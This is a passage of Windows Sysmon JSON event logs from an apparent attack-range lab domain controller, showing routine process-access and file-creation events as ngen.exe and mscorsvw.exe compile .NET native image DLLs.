05:59:41.200","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-00108BBE1000}","TargetProcessId":"2528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7548,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:41.246\r\nProcessGuid: {A837DB8D-04CD-5F25-0000-00108BBE1000}\r\nProcessId: 2528\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9e0-0\\System.IO.Compression.FileSystem.dll\r\nCreationUtcTime: 2020-08-01 05:59:41.246","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:41.246","ProcessGuid":"{A837DB8D-04CD-5F25-0000-00108BBE1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9e0-0\\System.IO.Compression.FileSystem.dll","CreationUtcTime":"2020-08-01 05:59:41.246","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7549,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.278\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04BF-5F25-0000-00101D5D1000}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.278","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04BF-5F25-0000-00101D5D1000}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7550,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.278\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04BF-5F25-0000-00101D5D1000}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.278","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04BF-5F25-0000-00101D5D1000}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7551,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.278\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04BF-5F25-0000-00101D5D1000}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.278","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04BF-5F25-0000-00101D5D1000}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7552,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.325\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C0-5F25-0000-00104B611000}\r\nTargetProcessId: 1436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.325","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C0-5F25-0000-00104B611000}","TargetProcessId":"1436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7553,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.325\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C0-5F25-0000-00104B611000}\r\nTargetProcessId: 1436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.325","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C0-5F25-0000-00104B611000}","TargetProcessId":"1436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7554,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-001045C51000}\r\nTargetProcessId: 1436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-001045C51000}","TargetProcessId":"1436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7555,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:41.668\r\nProcessGuid: {A837DB8D-04CD-5F25-0000-001045C51000}\r\nProcessId: 1436\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\59c-0\\System.IO.Log.dll\r\nCreationUtcTime: 2020-08-01 05:59:41.668","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:41.668","ProcessGuid":"{A837DB8D-04CD-5F25-0000-001045C51000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\59c-0\\System.IO.Log.dll","CreationUtcTime":"2020-08-01 05:59:41.668","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7556,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.700\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010C7130F00}\r\nTargetProcessId: 4460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 